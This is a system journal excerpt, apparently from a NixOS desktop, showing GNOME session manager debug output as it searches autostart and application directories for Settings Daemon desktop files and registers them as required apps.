machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Housekeeping.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App8 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Power.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App6 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.Keyboard.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.MediaKeys.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: read /run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmStore: Adding object id /org/gnome/SessionManager/App9 to store
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmManager: adding required app org.gnome.SettingsDaemon.PrintNotifications.desktop
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
